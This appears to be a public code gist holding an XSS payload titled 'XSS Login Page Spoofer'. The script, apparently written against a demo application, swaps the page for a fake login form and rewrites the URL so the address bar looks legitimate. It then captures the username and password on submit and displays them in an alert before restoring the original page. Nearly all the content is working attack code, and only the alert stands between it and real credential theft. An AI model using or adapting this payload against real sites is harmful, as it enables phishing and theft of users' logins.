public
Last active

XSS Login Page Spoofer

  • Download Gist
login_spoof.html
HTML
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46
<script>
replacement_page_url = 'index.php';
replacement_page_html = "\
<html>\
<head>\
<link rel='shortcut icon' href='data:image/vnd.microsoft.icon;base64,AAABAAEAEBAAAAAAAABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8p0/7/KdP+/ynT/v8q0/7/KdT+/yrT/v8p1P7/KtP+/ynT/v8q0/7/KdP+/yrT/v8p0/7/KtP+/wAAAP8AAAAUJLrf/ynT/v8p0/7/KdP+/yrT/v8p0/7/AAAA/wAAAP8p0/7/KtP+/ynT/v8q0/7/KdP+/yKw0/8AAAAJAAAAAAAAAP8p0/7/KdP+/yrT/v8p1P7/KtP+/xJfcv8SX3L/KdP+/yrT/v8p0/7/KtP+/ynT/v8AAAD/AAAAAAAAAAAAAAAAAQYI/ynT/v8p0/7/KtP+/ynT/v8AAAD/AAAA/ynT/v8q0/7/KdP+/yrT/v8CDQ//AAAAAAAAAAAAAAAAAAAAAAAAAP8p0/7/KtP+/ynU/v8q0/7/Jsnx/wAAAP8aiqb/KtP+/ynT/v8q0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ynT/v8q0/7/KdP+/yrT/v8p0v3/AAAA/xyTsf8p0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4q0/7/AAAA/wAAAP8p1P7/KtP+/wAAAP8AAAD/KdP+/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/xBYav8AAAD/KdP+/ynT/v8AAAD/DERS/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD0ozvf/AAAA/wAAAP8AAAD/AAAA/yrT/v8AAACpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ynT/v8p0/7/KdP+/ynT/v8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFHCL/KdT+/ynT/v8dlbT/AAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/yrU/v8q0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/BBkf/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAAAAAAAAAAAAgAEAAIABAADAAwAAwAMAAOAHAADgBwAA8A8AAPgPAAD4HwAA/D8AAPw/AAD+fwAA/38AAA=='>\
<link rel='icon' href='data:image/vnd.microsoft.icon;base64,AAABAAEAEBAAAAAAAABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8p0/7/KdP+/ynT/v8q0/7/KdT+/yrT/v8p1P7/KtP+/ynT/v8q0/7/KdP+/yrT/v8p0/7/KtP+/wAAAP8AAAAUJLrf/ynT/v8p0/7/KdP+/yrT/v8p0/7/AAAA/wAAAP8p0/7/KtP+/ynT/v8q0/7/KdP+/yKw0/8AAAAJAAAAAAAAAP8p0/7/KdP+/yrT/v8p1P7/KtP+/xJfcv8SX3L/KdP+/yrT/v8p0/7/KtP+/ynT/v8AAAD/AAAAAAAAAAAAAAAAAQYI/ynT/v8p0/7/KtP+/ynT/v8AAAD/AAAA/ynT/v8q0/7/KdP+/yrT/v8CDQ//AAAAAAAAAAAAAAAAAAAAAAAAAP8p0/7/KtP+/ynU/v8q0/7/Jsnx/wAAAP8aiqb/KtP+/ynT/v8q0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ynT/v8q0/7/KdP+/yrT/v8p0v3/AAAA/xyTsf8p0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4q0/7/AAAA/wAAAP8p1P7/KtP+/wAAAP8AAAD/KdP+/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/xBYav8AAAD/KdP+/ynT/v8AAAD/DERS/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD0ozvf/AAAA/wAAAP8AAAD/AAAA/yrT/v8AAACpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ynT/v8p0/7/KdP+/ynT/v8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFHCL/KdT+/ynT/v8dlbT/AAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/yrU/v8q0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/BBkf/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAAAAAAAAAAAAgAEAAIABAADAAwAAwAMAAOAHAADgBwAA8A8AAPgPAAD4HwAA/D8AAPw/AAD+fwAA/38AAA=='>\
<title>Password Cross-Site Scripting</title>\
</head>\
<body>\
<h2>Log Into Secret Application</h2>\
<form method='POST' action='index.php' autocomplete='on'>\
username:<input type='text' id='username' name='username' value='' autocomplete='on'><br>\
password:<input type='password' id='password' name='password' value='' autocomplete='on'><br>\
<input type='submit' name='login' value='Log In'>\
</form>\
<br>\
<br>\
come play with <a href='reflections.php'>reflections</a>\
</body>\
</html>\
"
window.addEventListener('load',function(){
oldhtml = document.body.innerHTML
oldurl = document.location.pathname
document.body.innerHTML = replacement_page_html
if(window.history.pushState)
window.history.pushState('','',replacement_page_url)
forms = document.querySelectorAll('form')
for(i=0;i<forms.length;i++){
forms[i].addEventListener('submit',function(e){
e.preventDefault()
e.stopPropagation()
data = ''
inputs = document.querySelectorAll('input')
for(x=0;x<inputs.length;x++){
data += inputs[x].name + "=" + inputs[x].value + ';'
}
alert(data)
if(window.history.pushState)
window.history.pushState('','',oldurl)
document.body.innerHTML = oldhtml
})
}
})
</script>

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.